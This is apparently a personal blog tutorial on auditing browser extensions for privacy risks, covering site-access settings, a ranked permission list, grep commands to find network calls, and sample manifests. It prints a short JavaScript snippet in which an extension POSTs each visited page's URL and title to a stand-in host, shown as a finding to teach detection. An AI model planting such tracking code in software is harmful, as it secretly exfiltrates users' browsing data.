How to Audit Browser Extension Permissions for Privacy Risks

Apr 2, 2026

I discovered my password manager extension had been running a background service worker 24/7, and I had no idea what it was doing. That “On all sites” permission I’d blindly approved? It meant the extension could read everything on every webpage I visited—including my banking sessions, email, and private ChatGPT conversations.

If you’re like me, you’ve installed dozens of browser extensions over the years without thinking twice. The scary truth: some of them are collecting and selling your data. Here’s how I audited every extension on my system and what I found.

The Wake-Up Call

A Reddit thread caught my attention: users discovered extensions that read their ChatGPT conversations and sold the data to advertisers. One person found an extension injecting ads by monitoring everything they typed.

I decided to audit my own extensions. What I found made me immediately remove half of them.

Step 1: Check What Extensions Can Access

Chrome: The Site Access Problem

I started with Chrome’s extension settings:

Navigate to chrome://extensions
Enable “Developer mode” (top right toggle)
Click “Details” on each extension
Look for “Site access” setting

The most dangerous setting is “On all sites.” This means the extension can read, modify, and track everything you do online.

CRITICAL: On all sites          <- Can access EVERY website
HIGH:     On specific sites     <- Limited to certain domains
LOW:      On click              <- Only active when you click it

I found 7 of my 12 extensions had “On all sites” access. For a dark mode extension, that makes sense. But why did my screenshot tool need access to my banking page?

Firefox: Similar Problems

Firefox users have it slightly better:

Open about:addons
Click on any extension
Check the “Permissions” tab

Firefox shows you what data the extension collects, but the same risks apply.

Step 2: Find the Dangerous Permissions

I learned there’s a hierarchy of dangerous permissions. Here’s what I now check for:

CRITICAL:
  - <all_urls>          <- Access to EVERY website
  - *://*/*             <- Same thing, different syntax
  - webRequest          <- Can intercept ALL network requests
  - clipboardRead       <- Can read passwords you copy

HIGH:
  - tabs                <- See which sites you visit
  - history             <- Access entire browsing history
  - cookies             <- Access session cookies, auth tokens
  - clipboardWrite      <- Can modify clipboard contents

MEDIUM:
  - bookmarks           <- Read all your bookmarks
  - identity            <- Sign-in with Google/Facebook

LOW:
  - storage             <- Store data locally (usually fine)
  - activeTab           <- Only current tab when clicked

The clipboardRead permission is particularly scary. If an extension can read your clipboard, it can grab passwords you copy from your password manager.

Step 3: Inspect Background Activity

This was eye-opening. Chrome extensions can run background processes even when you’re not using them.

Open chrome://service-workers
See which extensions have active background processes
Check network activity in real-time

I found two extensions making network requests to servers I didn’t recognize, every few minutes, even when I wasn’t actively using them.

Extension A: Polling analytics.example.com every 60 seconds
Extension B: Unknown POST requests to tracking.pixel.net
Extension C: Idle (good)
Extension D: Sending data to api.shopping-tracker.com

Two of my extensions were constantly phoning home. I removed them immediately.

Step 4: Audit the Source Code Directly

Here’s what most people don’t realize: extension source code is stored locally as plain text JavaScript. You can read it yourself.

Finding Extension Files

Chrome on macOS:

cd ~/Library/Application\ Support/Google/Chrome/Default/Extensions/
ls -la

Chrome on Windows:

%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\

Chrome on Linux:

~/.config/google-chrome/Default/Extensions/

Each extension has its own folder, named by its extension ID.

What to Look For

Once you find the extension folder, open manifest.json first:

cat manifest.json | grep -A 30 '"permissions"'
cat manifest.json | grep -A 10 '"host_permissions"'

Then search for suspicious patterns in the JavaScript files:

# Find external network calls
grep -r "fetch(" . --include="*.js"
grep -r "XMLHttpRequest" . --include="*.js"

# Find analytics/tracking
grep -r "analytics" . --include="*.js"
grep -r "telemetry" . --include="*.js"
grep -r "tracking" . --include="*.js"

# Find external URLs
grep -r "https://" . --include="*.js" | grep -v ".map"

What I Found in My Audit

One extension I’d trusted for years had this in its code:

// The extension was sending data to a third-party server
chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
  if (changeInfo.status === 'complete') {
    fetch('https://datacollector.example.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        url: tab.url,
        title: tab.title,
        timestamp: Date.now()
      })
    });
  }
});

Every page I visited was being sent to an external server. I had no idea.

Step 5: The Manifest Analysis

The manifest.json file tells you exactly what an extension can do. Here’s what I now look for:

Dangerous configuration:

{
  "manifest_version": 3,
  "name": "Suspicious Extension",
  "permissions": [
    "tabs",
    "clipboardRead",
    "history",
    "webRequest"
  ],
  "host_permissions": [
    "<all_urls>"
  ],
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}

This extension can: read every site, access clipboard, see browsing history, intercept network requests, and inject scripts on every page.

Safer configuration:

{
  "manifest_version": 3,
  "name": "Minimal Permission Extension",
  "permissions": [
    "activeTab",
    "storage"
  ],
  "host_permissions": [
    "https://specific-site.com/*"
  ]
}

This only accesses the current tab when clicked and only communicates with one specific site.

Step 6: Open Source vs Closed Source

I learned something important: open source extensions are easier to trust.

Dark Reader is a perfect example. It has <all_urls> permission, which sounds scary. But it’s open source—anyone can verify the code isn’t doing anything malicious. The code matches what’s published on GitHub.

Closed source extensions? You have to trust the developer’s privacy policy, which can change when the company gets acquired.

How to verify open source claims:

Check the extension page for a GitHub link
Download the published extension
Compare the code with the GitHub repository
Look for security audits or community reviews

My 5-Minute Audit Checklist

After all this research, I created a quick checklist for auditing any extension:

Check site access (prefer “On click” or specific sites)
Review requested permissions in details
Check if background service worker is running (chrome://service-workers)
Look for open source repository
Search for recent security reports
Check last update date (abandoned = risky)
Review number of users (very low = suspicious)
Read reviews for privacy complaints

The Results of My Audit

Out of 12 extensions:

Removed 6 immediately - unnecessary permissions, suspicious code, or abandoned
Changed 4 to “On click” access - limited when they can access my data
Kept 2 with full access - open source, verified, and essential

The extensions I removed included two shopping helpers, a PDF converter, and a “speed booster” that was actually collecting browsing data.

Why This Matters

Your browsing data has value. Companies pay for information about what you search for, what you buy, what you read. Extensions with broad permissions can harvest this data and sell it.

Even legitimate-seeming extensions can turn malicious. A 2024 study found that 30% of Chrome extensions with over 1,000 users had privacy issues. Some start clean, then add tracking code after they have a user base.

The Trade-Offs

I’m not suggesting you remove all extensions. Some are genuinely useful. But consider:

Worth the risk (with verification):

Password managers (verify they’re reputable, check permissions)
Essential developer tools (check if open source)
Productivity tools from major companies

Usually unnecessary risk:

Shopping helpers (often just data collectors)
“Speed boosters” (rarely effective, often trackers)
PDF converters (use web services or desktop apps instead)
Ad blockers from unknown developers

Key Takeaways

“On all sites” is the biggest red flag - limit extensions to specific sites or “on click”
Source code is stored locally - you can always audit it yourself
Open source extensions are easier to trust - claims can be verified by anyone
Check chrome://service-workers - see what’s running in the background
Clipboard, history, and cookie permissions are sensitive - think twice before granting
Abandoned extensions are security risks - no security updates means vulnerabilities

The Reddit discussion about extensions reading ChatGPT conversations and selling the data isn’t theoretical. It’s happening. Take 10 minutes to audit your extensions. Remove what you don’t need. Limit what you keep. Your browsing data is worth protecting.

Final Words + More Resources

My intention with this article was to help others share my knowledge and experience. If you want to contact me, you can contact by email: Email me

Here are also the most important links from this article along with some further resources that will help you in this scope:

Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!